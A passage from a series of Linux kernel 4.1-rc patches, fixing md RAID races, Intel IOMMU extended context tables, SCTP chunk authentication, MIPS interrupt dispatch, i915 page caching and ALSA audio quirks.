+ */ + caps->cmd_pause = !!(device->device_pause && device->device_resume); caps->cmd_terminate = !!device->device_terminate_all; return 0; From c008f1d356277a5b7561040596a073d87e56b0c8 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 12 Jun 2015 19:46:44 +1000 Subject: [PATCH 838/872] md: don't return 0 from array_state_store Returning zero from a 'store' function is bad. The return value should be either len length of the string or an error. So use 'len' if 'err' is zero. Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.") Signed-off-by: NeilBrown Cc: stable@vger.kernel (v4.0+) --- drivers/md/md.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/md/md.c b/drivers/md/md.c index 27506302eb7a..dd59d71ade2f 100644 --- a/drivers/md/md.c +++ b/drivers/md/md.c @@ -3834,7 +3834,7 @@ array_state_store(struct mddev *mddev, const char *buf, size_t len) err = -EBUSY; } spin_unlock(&mddev->lock); - return err; + return err ?: len; } err = mddev_lock(mddev); if (err) From 8e8e2518fceca407bb8fc2a6710d19d2e217892e Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 12 Jun 2015 19:51:27 +1000 Subject: [PATCH 839/872] md: Close race when setting 'action' to 'idle'. Checking ->sync_thread without holding the mddev_lock() isn't really safe, even after flushing the workqueue which ensures md_start_sync() has been run. While this code is waiting for the lock, md_check_recovery could reap the thread itself, and then start another thread (e.g. recovery might finish, then reshape starts). When this thread gets the lock md_start_sync() hasn't run so it doesn't get reaped, but MD_RECOVERY_RUNNING gets cleared. This allows two threads to start which leads to confusion. So don't both if MD_RECOVERY_RUNNING isn't set, but if it is do the flush and the test and the reap all under the mddev_lock to avoid any race with md_check_recovery. Signed-off-by: NeilBrown Fixes: 6791875e2e53 ("md: make reconfig_mutex optional for writes to md sysfs files.") Cc: stable@vger.kernel.org (v4.0+) --- drivers/md/md.c | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/drivers/md/md.c b/drivers/md/md.c index dd59d71ade2f..8d4408baa428 100644 --- a/drivers/md/md.c +++ b/drivers/md/md.c @@ -4217,13 +4217,14 @@ action_store(struct mddev *mddev, const char *page, size_t len) set_bit(MD_RECOVERY_FROZEN, &mddev->recovery); else clear_bit(MD_RECOVERY_FROZEN, &mddev->recovery); - flush_workqueue(md_misc_wq); - if (mddev->sync_thread) { - set_bit(MD_RECOVERY_INTR, &mddev->recovery); - if (mddev_lock(mddev) == 0) { + if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery) && + mddev_lock(mddev) == 0) { + flush_workqueue(md_misc_wq); + if (mddev->sync_thread) { + set_bit(MD_RECOVERY_INTR, &mddev->recovery); md_reap_sync_thread(mddev); - mddev_unlock(mddev); } + mddev_unlock(mddev); } } else if (test_bit(MD_RECOVERY_RUNNING, &mddev->recovery) || test_bit(MD_RECOVERY_NEEDED, &mddev->recovery)) From ea358cd0d2c634ff1379a1392edcdf2289f31e13 Mon Sep 17 00:00:00 2001 From: NeilBrown Date: Fri, 12 Jun 2015 20:05:04 +1000 Subject: [PATCH 840/872] md: make sure MD_RECOVERY_DONE is clear before starting recovery/resync MD_RECOVERY_DONE is normally cleared by md_check_recovery after a resync etc finished. However it is possible for raid5_start_reshape to race and start a reshape before MD_RECOVERY_DONE is cleared. This can lean to multiple reshapes running at the same time, which isn't good. 
To make sure it is cleared before starting a reshape, and also clear it when reaping a thread, just to be safe. Signed-off-by: NeilBrown --- drivers/md/md.c | 1 + drivers/md/raid10.c | 1 + drivers/md/raid5.c | 1 + 3 files changed, 3 insertions(+) diff --git a/drivers/md/md.c b/drivers/md/md.c index 8d4408baa428..4dbed4a67aaf 100644 --- a/drivers/md/md.c +++ b/drivers/md/md.c @@ -8262,6 +8262,7 @@ void md_reap_sync_thread(struct mddev *mddev) if (mddev_is_clustered(mddev)) md_cluster_ops->metadata_update_finish(mddev); clear_bit(MD_RECOVERY_RUNNING, &mddev->recovery); + clear_bit(MD_RECOVERY_DONE, &mddev->recovery); clear_bit(MD_RECOVERY_SYNC, &mddev->recovery); clear_bit(MD_RECOVERY_RESHAPE, &mddev->recovery); clear_bit(MD_RECOVERY_REQUESTED, &mddev->recovery); diff --git a/drivers/md/raid10.c b/drivers/md/raid10.c index e793ab6b3570..f55c3f35b746 100644 --- a/drivers/md/raid10.c +++ b/drivers/md/raid10.c @@ -4156,6 +4156,7 @@ static int raid10_start_reshape(struct mddev *mddev) clear_bit(MD_RECOVERY_SYNC, &mddev->recovery); clear_bit(MD_RECOVERY_CHECK, &mddev->recovery); + clear_bit(MD_RECOVERY_DONE, &mddev->recovery); set_bit(MD_RECOVERY_RESHAPE, &mddev->recovery); set_bit(MD_RECOVERY_RUNNING, &mddev->recovery); diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c index 553d54b87052..b6793d2e051f 100644 --- a/drivers/md/raid5.c +++ b/drivers/md/raid5.c @@ -7354,6 +7354,7 @@ static int raid5_start_reshape(struct mddev *mddev) clear_bit(MD_RECOVERY_SYNC, &mddev->recovery); clear_bit(MD_RECOVERY_CHECK, &mddev->recovery); + clear_bit(MD_RECOVERY_DONE, &mddev->recovery); set_bit(MD_RECOVERY_RESHAPE, &mddev->recovery); set_bit(MD_RECOVERY_RUNNING, &mddev->recovery); mddev->sync_thread = md_register_thread(md_do_sync, mddev, From c83b2f20fdde578bded3dfc4405c5db7a039c694 Mon Sep 17 00:00:00 2001 From: David Woodhouse Date: Fri, 12 Jun 2015 10:15:49 +0100 Subject: [PATCH 841/872] iommu/vt-d: Only enable extended context tables if PASID is supported Although the extended tables are theoretically a completely orthogonal feature to PASID and anything else that *uses* the newly-available bits, some of the early hardware has problems even when all we do is enable them and use only the same bits that were in the old context tables. For now, there's no motivation to support extended tables unless we're going to use PASID support to do SVM. So just don't use them unless PASID support is advertised too. Also add a command-line bailout just in case later chips also have issues. The equivalent problem for PASID support has already been fixed with the upcoming VT-d spec update and commit bd00c606a ("iommu/vt-d: Change PASID support to bit 40 of Extended Capability Register"), because the problematic platforms use the old definition of the PASID-capable bit, which is now marked as reserved and meaningless. So with this change, we'll magically start using ECS again only when we see the new hardware advertising "hey, we have PASID support and we actually tested it this time" on bit 40. The VT-d hardware architect has promised that we are not going to have any reason to support ECS *without* PASID any time soon, and he'll make sure he checks with us before changing that. In the future, if hypothetical new features also use new bits in the context tables and can be seen on implementations *without* PASID support, we might need to add their feature bits to the ecs_enabled() macro. 
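In practice the opt-out is exercised from the kernel command line. Assuming the option is wired into the existing intel_iommu= parameter, as the intel_iommu_setup() hunk below does, booting with

    intel_iommu=ecs_off

falls back to the legacy root/context table format even on hardware that advertises both ECS and the new PASID bit; without the option, ecs_enabled() now requires ecap_ecs() and ecap_pasid() to both be set before the extended tables are used.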
Signed-off-by: David Woodhouse --- Documentation/kernel-parameters.txt | 6 ++++++ drivers/iommu/intel-iommu.c | 18 +++++++++++++++--- 2 files changed, 21 insertions(+), 3 deletions(-) diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt index f6befa9855c1..491bb15620fc 100644 --- a/Documentation/kernel-parameters.txt +++ b/Documentation/kernel-parameters.txt @@ -1481,6 +1481,12 @@ bytes respectively. Such letter suffixes can also be entirely omitted. By default, super page will be supported if Intel IOMMU has the capability. With this option, super page will not be supported. + ecs_off [Default Off] + By default, extended context tables will be supported if + the hardware advertises that it has support both for the + extended tables themselves, and also PASID support. With + this option set, extended tables will not be used even + on hardware which claims to support them. intel_idle.max_cstate= [KNL,HW,ACPI,X86] 0 disables intel_idle and fall back on acpi_idle. diff --git a/drivers/iommu/intel-iommu.c b/drivers/iommu/intel-iommu.c index 2ffe58969944..5ecfaf29933a 100644 --- a/drivers/iommu/intel-iommu.c +++ b/drivers/iommu/intel-iommu.c @@ -422,6 +422,14 @@ static int dmar_map_gfx = 1; static int dmar_forcedac; static int intel_iommu_strict; static int intel_iommu_superpage = 1; +static int intel_iommu_ecs = 1; + +/* We only actually use ECS when PASID support (on the new bit 40) + * is also advertised. Some early implementations — the ones with + * PASID support on bit 28 — have issues even when we *only* use + * extended root/context tables. */ +#define ecs_enabled(iommu) (intel_iommu_ecs && ecap_ecs(iommu->ecap) && \ + ecap_pasid(iommu->ecap)) int intel_iommu_gfx_mapped; EXPORT_SYMBOL_GPL(intel_iommu_gfx_mapped); @@ -465,6 +473,10 @@ static int __init intel_iommu_setup(char *str) printk(KERN_INFO "Intel-IOMMU: disable supported super page\n"); intel_iommu_superpage = 0; + } else if (!strncmp(str, "ecs_off", 7)) { + printk(KERN_INFO + "Intel-IOMMU: disable extended context table support\n"); + intel_iommu_ecs = 0; } str += strcspn(str, ","); @@ -669,7 +681,7 @@ static inline struct context_entry *iommu_context_addr(struct intel_iommu *iommu struct context_entry *context; u64 *entry; - if (ecap_ecs(iommu->ecap)) { + if (ecs_enabled(iommu)) { if (devfn >= 0x80) { devfn -= 0x80; entry = &root->hi; @@ -806,7 +818,7 @@ static void free_context_table(struct intel_iommu *iommu) if (context) free_pgtable_page(context); - if (!ecap_ecs(iommu->ecap)) + if (!ecs_enabled(iommu)) continue; context = iommu_context_addr(iommu, i, 0x80, 0); @@ -1141,7 +1153,7 @@ static void iommu_set_root_entry(struct intel_iommu *iommu) unsigned long flag; addr = virt_to_phys(iommu->root_entry); - if (ecap_ecs(iommu->ecap)) + if (ecs_enabled(iommu)) addr |= DMA_RTADDR_RTT; raw_spin_lock_irqsave(&iommu->register_lock, flag); From ae36806a622aea5ac79f279cfccc82144967b6e7 Mon Sep 17 00:00:00 2001 From: Marcelo Ricardo Leitner Date: Thu, 11 Jun 2015 14:49:46 -0300 Subject: [PATCH 842/872] sctp: allow authenticating DATA chunks that are bundled with COOKIE_ECHO Currently, we can ask to authenticate DATA chunks and we can send DATA chunks on the same packet as COOKIE_ECHO, but if you try to combine both, the DATA chunk will be sent unauthenticated and peer won't accept it, leading to a communication failure. 
This happens because even though the data was queued after it was requested to authenticate DATA chunks, it was also queued before we could know that remote peer can handle authenticating, so sctp_auth_send_cid() returns false. The fix is whenever we set up an active key, re-check send queue for chunks that now should be authenticated. As a result, such packet will now contain COOKIE_ECHO + AUTH + DATA chunks, in that order. Reported-by: Liu Wei Signed-off-by: Marcelo Ricardo Leitner Acked-by: Neil Horman Acked-by: Vlad Yasevich Signed-off-by: David S. Miller --- net/sctp/auth.c | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/net/sctp/auth.c b/net/sctp/auth.c index fb7976aee61c..4f15b7d730e1 100644 --- a/net/sctp/auth.c +++ b/net/sctp/auth.c @@ -381,13 +381,14 @@ int sctp_auth_asoc_copy_shkeys(const struct sctp_endpoint *ep, } -/* Public interface to creat the association shared key. +/* Public interface to create the association shared key. * See code above for the algorithm. */ int sctp_auth_asoc_init_active_key(struct sctp_association *asoc, gfp_t gfp) { struct sctp_auth_bytes *secret; struct sctp_shared_key *ep_key; + struct sctp_chunk *chunk; /* If we don't support AUTH, or peer is not capable * we don't need to do anything. @@ -410,6 +411,14 @@ int sctp_auth_asoc_init_active_key(struct sctp_association *asoc, gfp_t gfp) sctp_auth_key_put(asoc->asoc_shared_key); asoc->asoc_shared_key = secret; + /* Update send queue in case any chunk already in there now + * needs authenticating + */ + list_for_each_entry(chunk, &asoc->outqueue.out_chunk_list, list) { + if (sctp_auth_send_cid(chunk->chunk_hdr->type, asoc)) + chunk->auth = 1; + } + return 0; } From b07d496177cd3bc4b70fb8a5e85ede24cb403a11 Mon Sep 17 00:00:00 2001 From: Masanari Iida Date: Sat, 13 Jun 2015 00:23:21 +0900 Subject: [PATCH 843/872] Doc: networking: Fix URL for wiki.wireshark.org in udplite.txt This patch fix URL (http to https) for wiki.wireshark.org. Signed-off-by: Masanari Iida Signed-off-by: David S. Miller --- Documentation/networking/udplite.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Documentation/networking/udplite.txt b/Documentation/networking/udplite.txt index d727a3829100..53a726855e49 100644 --- a/Documentation/networking/udplite.txt +++ b/Documentation/networking/udplite.txt @@ -20,7 +20,7 @@ files/UDP-Lite-HOWTO.txt o The Wireshark UDP-Lite WiKi (with capture files): - http://wiki.wireshark.org/Lightweight_User_Datagram_Protocol + https://wiki.wireshark.org/Lightweight_User_Datagram_Protocol o The Protocol Spec, RFC 3828, http://www.ietf.org/rfc/rfc3828.txt From 1b3ed367ce11fb39a345d807ef4168f727236083 Mon Sep 17 00:00:00 2001 From: Rabin Vincent Date: Fri, 12 Jun 2015 10:01:56 +0200 Subject: [PATCH 844/872] IRQCHIP: mips-gic: Don't nest calls to do_IRQ() The GIC chained handlers use do_IRQ() to call the subhandlers. This means that irq_enter() calls get nested, which leads to preempt count looking like we're in nested interrupts, which in turn leads to all system time being accounted as IRQ time in account_system_time(). Fix it by using generic_handle_irq(). Since these same functions are used in some systems (if cpu_has_veic) from a low-level vectored interrupt handler which does not go throught do_IRQ(), we need to do it conditionally. 
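The reason the chained path has to avoid do_IRQ() is that do_IRQ() brackets the handler with irq_enter()/irq_exit(); calling it again from a handler that is itself already running under do_IRQ() makes the preempt count look like a nested hard interrupt, which is what skews account_system_time(). A hypothetical cascaded-interrupt demux, shown only to illustrate the two dispatch styles (a real driver would read its pending-status register rather than scan every source):

    static struct irq_domain *demux_domain;     /* assumed set up at probe time */

    /* Chained handler: the parent interrupt already went through
     * do_IRQ(), so children are dispatched with generic_handle_irq()
     * to avoid nesting irq_enter()/irq_exit().
     */
    static void demux_irq_dispatch(unsigned int irq, struct irq_desc *desc)
    {
            unsigned int hwirq, virq;

            for (hwirq = 0; hwirq < 8; hwirq++) {       /* say, 8 cascaded sources */
                    virq = irq_linear_revmap(demux_domain, hwirq);
                    if (virq)
                            generic_handle_irq(virq);   /* not do_IRQ(virq) */
            }
    }

When the same dispatch code is entered directly from a low-level vectored handler (the cpu_has_veic case mentioned above), there is no outer do_IRQ() and the full do_IRQ() path is still the right thing, hence the chained flag added by the patch.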
Signed-off-by: Rabin Vincent Reviewed-by: Andrew Bresticker Acked-by: Thomas Gleixner Cc: linux-mips@linux-mips.org Cc: tglx@linutronix.de Cc: jason@lakedaemon.net Patchwork: https://patchwork.linux-mips.org/patch/10545/ Signed-off-by: Ralf Baechle --- drivers/irqchip/irq-mips-gic.c | 21 ++++++++++++++------- 1 file changed, 14 insertions(+), 7 deletions(-) diff --git a/drivers/irqchip/irq-mips-gic.c b/drivers/irqchip/irq-mips-gic.c index 57f09cb54464..269c2354c431 100644 --- a/drivers/irqchip/irq-mips-gic.c +++ b/drivers/irqchip/irq-mips-gic.c @@ -271,7 +271,7 @@ int gic_get_c0_fdc_int(void) GIC_LOCAL_TO_HWIRQ(GIC_LOCAL_INT_FDC)); } -static void gic_handle_shared_int(void) +static void gic_handle_shared_int(bool chained) { unsigned int i, intr, virq; unsigned long *pcpu_mask; @@ -299,7 +299,10 @@ static void gic_handle_shared_int(void) while (intr != gic_shared_intrs) { virq = irq_linear_revmap(gic_irq_domain, GIC_SHARED_TO_HWIRQ(intr)); - do_IRQ(virq); + if (chained) + generic_handle_irq(virq); + else + do_IRQ(virq); /* go to next pending bit */ bitmap_clear(pending, intr, 1); @@ -431,7 +434,7 @@ static struct irq_chip gic_edge_irq_controller = { #endif }; -static void gic_handle_local_int(void) +static void gic_handle_local_int(bool chained) { unsigned long pending, masked; unsigned int intr, virq; @@ -445,7 +448,10 @@ static void gic_handle_local_int(void) while (intr != GIC_NUM_LOCAL_INTRS) { virq = irq_linear_revmap(gic_irq_domain, GIC_LOCAL_TO_HWIRQ(intr)); - do_IRQ(virq); + if (chained) + generic_handle_irq(virq); + else + do_IRQ(virq); /* go to next pending bit */ bitmap_clear(&pending, intr, 1); @@ -509,13 +515,14 @@ static struct irq_chip gic_all_vpes_local_irq_controller = { static void __gic_irq_dispatch(void) { - gic_handle_local_int(); - gic_handle_shared_int(); + gic_handle_local_int(false); + gic_handle_shared_int(false); } static void gic_irq_dispatch(unsigned int irq, struct irq_desc *desc) { - __gic_irq_dispatch(); + gic_handle_local_int(true); + gic_handle_shared_int(true); } #ifdef CONFIG_MIPS_GIC_IPI From 36f58113423f4588d7cf7535644fbb214414193b Mon Sep 17 00:00:00 2001 From: Jaedon Shin Date: Fri, 12 Jun 2015 18:04:14 +0900 Subject: [PATCH 845/872] MPI: MIPS: Fix compilation error with GCC 5.1 This patch fixes mips compilation error: lib/mpi/generic_mpih-mul1.c: In function 'mpihelp_mul_1': lib/mpi/longlong.h:651:2: error: impossible constraint in 'asm' Signed-off-by: Jaedon Shin Cc: Linux-MIPS Patchwork: https://patchwork.linux-mips.org/patch/10546/ Signed-off-by: Ralf Baechle --- lib/mpi/longlong.h | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/mpi/longlong.h b/lib/mpi/longlong.h index aac511417ad1..a89d041592c8 100644 --- a/lib/mpi/longlong.h +++ b/lib/mpi/longlong.h @@ -639,7 +639,7 @@ do { \ ************** MIPS ***************** ***************************************/ #if defined(__mips__) && W_TYPE_SIZE == 32 -#if __GNUC__ >= 4 && __GNUC_MINOR__ >= 4 +#if (__GNUC__ >= 5) || (__GNUC__ >= 4 && __GNUC_MINOR__ >= 4) #define umul_ppmm(w1, w0, u, v) \ do { \ UDItype __ll = (UDItype)(u) * (v); \ @@ -671,7 +671,7 @@ do { \ ************** MIPS/64 ************** ***************************************/ #if (defined(__mips) && __mips >= 3) && W_TYPE_SIZE == 64 -#if __GNUC__ >= 4 && __GNUC_MINOR__ >= 4 +#if (__GNUC__ >= 5) || (__GNUC__ >= 4 && __GNUC_MINOR__ >= 4) #define umul_ppmm(w1, w0, u, v) \ do { \ typedef unsigned int __ll_UTItype __attribute__((mode(TI))); \ From acbf6ed1ca5d6408d85290d5d2a6ac4a2069e735 Mon Sep 17 00:00:00 2001 From: 
Hajime Tazaki Date: Sun, 14 Jun 2015 18:51:20 +0900 Subject: [PATCH 846/872] lib: fix __ktime_divns() to latest update Signed-off-by: Hajime Tazaki --- arch/lib/time.c | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/arch/lib/time.c b/arch/lib/time.c index b54be754f532..7129660e66b2 100644 --- a/arch/lib/time.c +++ b/arch/lib/time.c @@ -71,21 +71,23 @@ ktime_t ktime_get_with_offset(enum tk_offsets offs) /* * Divide a ktime value by a nanosecond value */ -u64 __ktime_divns(const ktime_t kt, s64 div) +s64 __ktime_divns(const ktime_t kt, s64 div) { - u64 dclc; int sft = 0; + s64 dclc; + u64 tmp; dclc = ktime_to_ns(kt); + tmp = dclc < 0 ? -dclc : dclc; + /* Make sure the divisor is less than 2^32: */ while (div >> 32) { sft++; div >>= 1; } - dclc >>= sft; - do_div(dclc, (unsigned long)div); - - return dclc; + tmp >>= sft; + do_div(tmp, (unsigned long) div); + return dclc < 0 ? -tmp : tmp; } #endif /* BITS_PER_LONG >= 64 */ From 0f57d86787d8b1076ea8f9cbdddda2a46d534a27 Mon Sep 17 00:00:00 2001 From: Linus Torvalds Date: Sun, 14 Jun 2015 15:51:10 -1000 Subject: [PATCH 847/872] Linux 4.1-rc8 --- Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 40a8b068ac26..3ba504496cb2 100644 --- a/Makefile +++ b/Makefile @@ -1,7 +1,7 @@ VERSION = 4 PATCHLEVEL = 1 SUBLEVEL = 0 -EXTRAVERSION = -rc7 +EXTRAVERSION = -rc8 NAME = Hurr durr I'ma sheep # *DOCUMENTATION* From 016a65a39170c3cdca09a6ac343ff4f124668b45 Mon Sep 17 00:00:00 2001 From: Chris Wilson Date: Thu, 11 Jun 2015 08:06:08 +0100 Subject: [PATCH 848/872] drm/i915: Always reset vma->ggtt_view.pages cache on unbinding With the introduction of multiple views of an obj in the same vm, each vma was taught to cache its copy of the pages (so that different views could have different page arrangements). However, this missed decoupling those vma->ggtt_view.pages when the vma released its reference on the obj->pages. As we don't always free the vma, this leads to a possible scenario (e.g. execbuffer interrupted by the shrinker) where the vma points to a stale obj->pages, and explodes. Fixes regression from commit fe14d5f4e5468c5b80a24f1a64abcbe116143670 Author: Tvrtko Ursulin Date: Wed Dec 10 17:27:58 2014 +0000 drm/i915: Infrastructure for supporting different GGTT views per object Tvrtko says, if someone else will be confused how this can happen, key is the reservation execbuffer path. That puts the VMA on the exec_list which prevents i915_vma_unbind and i915_gem_vma_destroy from fully destroying the VMA. So the VMA is left existing as an empty object in the list - unbound and disassociated with the backing store. Kind of a cached memory object. And then re-using it needs to clear the cached pages pointer which is fixed above. Bugzilla: https://bugzilla.redhat.com/show_bug.cgi?id=1227892 Signed-off-by: Chris Wilson Cc: Tvrtko Ursulin Cc: Daniel Vetter Cc: Michel Thierry Cc: stable@vger.kernel.org Reviewed-by: Tvrtko Ursulin [Jani: Added Tvrtko's explanation to commit message.] 
Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/i915_gem.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/gpu/drm/i915/i915_gem.c b/drivers/gpu/drm/i915/i915_gem.c index 851b585987f9..c3806c66650a 100644 --- a/drivers/gpu/drm/i915/i915_gem.c +++ b/drivers/gpu/drm/i915/i915_gem.c @@ -3000,8 +3000,8 @@ int i915_vma_unbind(struct i915_vma *vma) } else if (vma->ggtt_view.pages) { sg_free_table(vma->ggtt_view.pages); kfree(vma->ggtt_view.pages); - vma->ggtt_view.pages = NULL; } + vma->ggtt_view.pages = NULL; } drm_mm_remove_node(&vma->node); From 6ab42ff44864d26e8e498b8ac655d24ee389d267 Mon Sep 17 00:00:00 2001 From: Hui Wang Date: Mon, 15 Jun 2015 17:43:39 +0800 Subject: [PATCH 849/872] ALSA: hda - adding a DAC/pin preference map for a HP Envy TS machine On a HP Envy TouchSmart laptop, there are 2 speakers (main speaker and subwoofer speaker), 1 headphone and 2 DACs, without this fixup, the headphone will be assigned to a DAC and the 2 speakers will be assigned to another DAC, this assignment makes the surround-2.1 channels invalid. To fix it, here using a DAC/pin preference map to bind the main speaker to 1 DAC and the subwoofer speaker will be assigned to another DAC. Cc: Signed-off-by: Hui Wang Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_sigmatel.c | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c index 6833c74ed6ff..6c66d7e16439 100644 --- a/sound/pci/hda/patch_sigmatel.c +++ b/sound/pci/hda/patch_sigmatel.c @@ -100,6 +100,7 @@ enum { STAC_HP_ENVY_BASS, STAC_HP_BNB13_EQ, STAC_HP_ENVY_TS_BASS, + STAC_HP_ENVY_TS_DAC_BIND, STAC_92HD83XXX_GPIO10_EAPD, STAC_92HD83XXX_MODELS }; @@ -2171,6 +2172,22 @@ static void stac92hd83xxx_fixup_gpio10_eapd(struct hda_codec *codec, spec->eapd_switch = 0; } +static void hp_envy_ts_fixup_dac_bind(struct hda_codec *codec, + const struct hda_fixup *fix, + int action) +{ + struct sigmatel_spec *spec = codec->spec; + static hda_nid_t preferred_pairs[] = { + 0xd, 0x13, + 0 + }; + + if (action != HDA_FIXUP_ACT_PRE_PROBE) + return; + + spec->gen.preferred_dacs = preferred_pairs; +} + static const struct hda_verb hp_bnb13_eq_verbs[] = { /* 44.1KHz base */ { 0x22, 0x7A6, 0x3E }, @@ -2686,6 +2703,12 @@ static const struct hda_fixup stac92hd83xxx_fixups[] = { {} }, }, + [STAC_HP_ENVY_TS_DAC_BIND] = { + .type = HDA_FIXUP_FUNC, + .v.func = hp_envy_ts_fixup_dac_bind, + .chained = true, + .chain_id = STAC_HP_ENVY_TS_BASS, + }, [STAC_92HD83XXX_GPIO10_EAPD] = { .type = HDA_FIXUP_FUNC, .v.func = stac92hd83xxx_fixup_gpio10_eapd, @@ -2764,6 +2787,8 @@ static const struct snd_pci_quirk stac92hd83xxx_fixup_tbl[] = { "HP bNB13", STAC_HP_BNB13_EQ), SND_PCI_QUIRK(PCI_VENDOR_ID_HP, 0x190e, "HP ENVY TS", STAC_HP_ENVY_TS_BASS), + SND_PCI_QUIRK(PCI_VENDOR_ID_HP, 0x1967, + "HP ENVY TS", STAC_HP_ENVY_TS_DAC_BIND), SND_PCI_QUIRK(PCI_VENDOR_ID_HP, 0x1940, "HP bNB13", STAC_HP_BNB13_EQ), SND_PCI_QUIRK(PCI_VENDOR_ID_HP, 0x1941, From 8b99aba70c5f581860736855e211cf981f438ad2 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Mon, 15 Jun 2015 11:59:32 +0200 Subject: [PATCH 850/872] ALSA: hda - Fix audio crackles on Dell Latitude E7x40 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit We still got a report that the audio crackles and noises occur with the recent 4.1 kernels on Dell machines. These machines seem to need similar workarounds that have been applied to the recent Dell XPS 13 models. 
Since the codec of these machines (Dell Latitute E7240 and E7440) is different from XPS 13's one, we need a new fixup entry. Also, it was confirmed that the previous workaround to disable the widget power-save (commit [219f47e4f964: ALSA: hda - Disable widget power-saving for ALC292 & co]) is no longer needed after this fix. So, this patch includes the partial revert of the commit, too. Reported-and-tested-by: Mihai Donțu Tested-by: Jonathan McDowell Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index 0320cb523d9e..919051d92a0b 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -4515,6 +4515,8 @@ enum { ALC288_FIXUP_DELL_HEADSET_MODE, ALC288_FIXUP_DELL1_MIC_NO_PRESENCE, ALC288_FIXUP_DELL_XPS_13_GPIO6, + ALC292_FIXUP_DELL_E7X, + ALC292_FIXUP_DISABLE_AAMIX, }; static const struct hda_fixup alc269_fixups[] = { @@ -5037,6 +5039,16 @@ static const struct hda_fixup alc269_fixups[] = { .chained = true, .chain_id = ALC288_FIXUP_DELL1_MIC_NO_PRESENCE }, + [ALC292_FIXUP_DISABLE_AAMIX] = { + .type = HDA_FIXUP_FUNC, + .v.func = alc_fixup_disable_aamix, + }, + [ALC292_FIXUP_DELL_E7X] = { + .type = HDA_FIXUP_FUNC, + .v.func = alc_fixup_dell_xps13, + .chained = true, + .chain_id = ALC292_FIXUP_DISABLE_AAMIX + }, }; static const struct snd_pci_quirk alc269_fixup_tbl[] = { @@ -5049,6 +5061,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = { SND_PCI_QUIRK(0x1025, 0x0775, "Acer Aspire E1-572", ALC271_FIXUP_HP_GATE_MIC_JACK_E1_572), SND_PCI_QUIRK(0x1025, 0x079b, "Acer Aspire V5-573G", ALC282_FIXUP_ASPIRE_V5_PINS), SND_PCI_QUIRK(0x1028, 0x0470, "Dell M101z", ALC269_FIXUP_DELL_M101Z), + SND_PCI_QUIRK(0x1028, 0x05ca, "Dell Latitude E7240", ALC292_FIXUP_DELL_E7X), + SND_PCI_QUIRK(0x1028, 0x05cb, "Dell Latitude E7440", ALC292_FIXUP_DELL_E7X), SND_PCI_QUIRK(0x1028, 0x05da, "Dell Vostro 5460", ALC290_FIXUP_SUBWOOFER), SND_PCI_QUIRK(0x1028, 0x05f4, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE), SND_PCI_QUIRK(0x1028, 0x05f5, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE), @@ -5637,8 +5651,7 @@ static int patch_alc269(struct hda_codec *codec) spec = codec->spec; spec->gen.shared_mic_vref_pin = 0x18; - if (codec->core.vendor_id != 0x10ec0292) - codec->power_save_node = 1; + codec->power_save_node = 1; snd_hda_pick_fixup(codec, alc269_fixup_models, alc269_fixup_tbl, alc269_fixups); From 0f252a3541b1051f600ca6a26ba9d8c67b4dd063 Mon Sep 17 00:00:00 2001 From: Nicholas Mc Guire Date: Sun, 14 Jun 2015 19:16:59 +0200 Subject: [PATCH 851/872] ALSA: mips: let SND_SGI_O2 select SND_PCM Fix the missing dependency on PCM stuff. [Add the same fix for HAL2, too -- tiwai] Signed-off-by: Nicholas Mc Guire Signed-off-by: Takashi Iwai --- sound/mips/Kconfig | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sound/mips/Kconfig b/sound/mips/Kconfig index d2f615ab177a..2153d31fb663 100644 --- a/sound/mips/Kconfig +++ b/sound/mips/Kconfig @@ -12,12 +12,14 @@ if SND_MIPS config SND_SGI_O2 tristate "SGI O2 Audio" depends on SGI_IP32 + select SND_PCM help Sound support for the SGI O2 Workstation. config SND_SGI_HAL2 tristate "SGI HAL2 Audio" depends on SGI_HAS_HAL2 + select SND_PCM help Sound support for the SGI Indy and Indigo2 Workstation. 
